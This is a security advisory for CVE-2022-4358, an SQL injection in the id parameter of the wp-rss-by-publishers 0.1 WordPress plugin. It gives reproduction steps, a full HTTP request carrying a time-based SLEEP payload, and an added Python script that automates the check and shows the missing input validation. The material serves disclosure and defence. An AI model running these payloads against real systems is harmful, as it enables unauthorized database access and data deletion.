wp-rss-by-publishers (3/3) WordPress plugin SQL injection

Vulnerability Metadata


Date of Disclosure: December 09 2022
Affected Software: wp-rss-by-publishers
Affected Software Type: WordPress plugin
Version: 0.1
Weakness: SQL Injection
CWE ID: CWE-89
CVE ID: CVE-2022-4358
CVSS 3.x Base Score: n/a
CVSS 2.0 Base Score: n/a
Reporter: Daniel Krohmer, Kunal Sharma
Reporter Contact: daniel.krohmer@iese.fraunhofer.de
Link to Affected Software: https://wordpress.org/plugins/wp-rss-by-publishers
Link to Vulnerability DB: https://nvd.nist.gov/vuln/detail/CVE-2022-4358

Vulnerability Description


The wsysadmin_rules admin page of the wp-rss-by-publishers 0.1 WordPress plugin is vulnerable to SQL injection: the id GET parameter is passed to a database query without sanitization or escaping. An authenticated attacker (administrator privileges are required, see the Exploitation Guide) can craft a GET request whose id value carries arbitrary SQL.

Exploitation Guide


This exploit was tested with WordPress 4.2, because the plugin no longer works on recent WordPress versions.

Several tables the plugin needs are never created, probably due to bugs in its installer. As a workaround, the tables can be created manually in the database:

CREATE TABLE wsys_publisher (id int not null, name varchar(255) not null, description varchar (255) not null, url varchar (255) not null, status int not null, api_key varchar (255) not null, image_1 varchar (255) not null, image_2 varchar (255)  not null, image_3 varchar (255) not null, feed_count int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, author_id int not null);

CREATE TABLE wsys_feed (id int not null, publisher_id int not null, name varchar(255) not null, url varchar (255) not null, plugin int not null, status int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, last_fetch varchar(255) not null, last_modified varchar(255) not null);

CREATE TABLE wsys_rule (id int not null, feed_id int not null, tags varchar(255) not null, categories varchar(255) not null, publisher_id int not null);

Log in as an administrator. This attack requires at least admin privileges.

[Screenshot: wp-rss-by-publishers_0-1_3_step-0.PNG]

Add a new publisher and provide values for Name, URL, and Description. Make sure the URL points to a valid RSS feed, then click Save.

[Screenshot: wp-rss-by-publishers_0-1_3_step-1.PNG]

Hover over the name of the publisher you just created and select Edit.

[Screenshot: wp-rss-by-publishers_0-1_3_step-2.PNG]

Clicking Edit triggers the following GET request to admin.php for the wsysadmin_publishers page, carrying the publisher's id:

[Screenshot: wp-rss-by-publishers_0-1_3_step-3.PNG]

This request is not the vulnerable one, but it is the template for it: change page from wsysadmin_publishers to wsysadmin_rules and set action to delete. The id query parameter of that request is the injection point:

[Screenshot: wp-rss-by-publishers_0-1_3_step-4.PNG]

A working exploit then looks like this (the full request is given under Exploit Payload below):

[Screenshot: wp-rss-by-publishers_0-1_3_step-5.PNG]

In the plugin code, the update_feeds function dispatches on the page parameter; the wsysadmin_rules case begins at line 905 of ./wp-rss-by-publisher.php.

[Screenshot: wp-rss-by-publishers_0-1_3_step-6.PNG]

If action is delete and id is non-empty, the WSYS_Feed::delete method is called and the id parameter is passed through unchanged (line 962 of ./wp-rss-by-publisher.php); no cast, escaping or prepared statement is applied at this point.

[Screenshot: wp-rss-by-publishers_0-1_3_step-7.PNG]

The final query, still containing the unescaped id, is executed at line 76 of ./classes/wsys-db.class.php.

[Screenshot: wp-rss-by-publishers_0-1_3_step-8.PNG]

Exploit Payload


Note that the cookies (and any nonces) in the request below come from the test setup and must be replaced with the values of your own authenticated admin session; otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below. The injected id value appends a subquery containing SLEEP(5), so a response that arrives roughly five seconds later than normal confirms that the value reached the database unescaped (time-based blind injection).

GET /wp-admin/admin.php?page=wsysadmin_rules&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/wp-admin/admin.php?page=wsysadmin_publishers
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7Cf3eea559c158e99ec2d37d673775cdbcbfc3d93c0664c89f6388b08014c281fa; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=0af4269367419c0bbf6d231a32ee61e8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7C252785010049c4ba6fa37a51a0ec52168de6bef203fffb7cf657ba749b7a5a81
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
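
The following Python script is an added example for this advisory, not code from the plugin or its reporters. It turns the request above into a repeatable time-based check (SLEEP(0) as baseline against SLEEP(5)) and, for the code path described in the Exploitation Guide, shows the input validation that the delete handler lacks: a rule id list is only ever integers, so anything else should be rejected before it can reach the query. The base URL, the cookie header and the 0.8 jitter factor are placeholders; the payload shape is the advisory's, with only the SLEEP() duration varied.

```python
"""Time-based blind SQL injection check for the wsysadmin_rules id parameter.

Added example for this advisory, not code from the plugin or its reporters.
Assumptions (not stated on the page): the base URL, the cookie header and the
timing threshold are placeholders you supply; the payload shape is copied from
the advisory's request, with only the SLEEP() duration varied.
"""
import re
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import List, Optional


def build_payload(delay: int) -> str:
    """The advisory's id value with a configurable SLEEP() duration.

    "0,1)" is kept exactly as in the advisory's request; the appended
    subquery stalls the statement for `delay` seconds when MySQL evaluates it.
    """
    return f"0,1) AND (SELECT 5926 FROM (SELECT(SLEEP({delay})))erUA"


def build_url(base: str, delay: int) -> str:
    """Full admin URL for the vulnerable page=wsysadmin_rules&action=delete request."""
    params = {"page": "wsysadmin_rules", "action": "delete", "id": build_payload(delay)}
    return base.rstrip("/") + "/wp-admin/admin.php?" + urllib.parse.urlencode(params)


def timing_indicates_injection(baseline: float, injected: float, delay: int) -> bool:
    """True when the SLEEP(delay) request took (almost) `delay` seconds longer
    than the SLEEP(0) baseline; the 0.8 factor absorbs network jitter (placeholder)."""
    return injected - baseline >= 0.8 * delay


def measure(url: str, cookie: str, timeout: float = 60.0) -> float:
    """Seconds until the server finishes responding; HTTP error pages still count."""
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # a 4xx/5xx page still tells us how long the query took
    return time.monotonic() - start


def check(base: str, cookie: str, delay: int = 5) -> bool:
    """Compare SLEEP(0) against SLEEP(delay); a large gap means id reached MySQL unescaped."""
    baseline = measure(build_url(base, 0), cookie)
    injected = measure(build_url(base, delay), cookie)
    return timing_indicates_injection(baseline, injected, delay)


# The validation the plugin is missing: the ids this page deletes are integers,
# so anything that is not a comma-separated list of integers is rejected before
# it can be interpolated into a query (the equivalent of WordPress absint() per
# value, or of binding each value with $wpdb->prepare('%d')).
_ID_LIST = re.compile(r"[0-9]+(,[0-9]+)*")


def sanitize_id_list(raw: str) -> Optional[List[int]]:
    """Return the integer ids, or None when the value is not a plain id list."""
    if not _ID_LIST.fullmatch(raw):
        return None
    return [int(part) for part in raw.split(",")]


if __name__ == "__main__":
    # Placeholders: point at your test instance and paste your own admin session cookie.
    BASE = "http://localhost"
    COOKIE = "wordpress_logged_in_<hash>=<value>"
    print("vulnerable" if check(BASE, COOKIE) else "no timing difference observed")
```

Run it only against a throwaway test instance: the request uses the plugin's delete action, and if the surrounding statement is the DELETE the advisory describes, rows matching the injected ids are removed on both the baseline and the delayed request. sanitize_id_list rejects the advisory's payload outright, which is the check that belongs in WSYS_Feed::delete before the id ever reaches wsys-db.class.php.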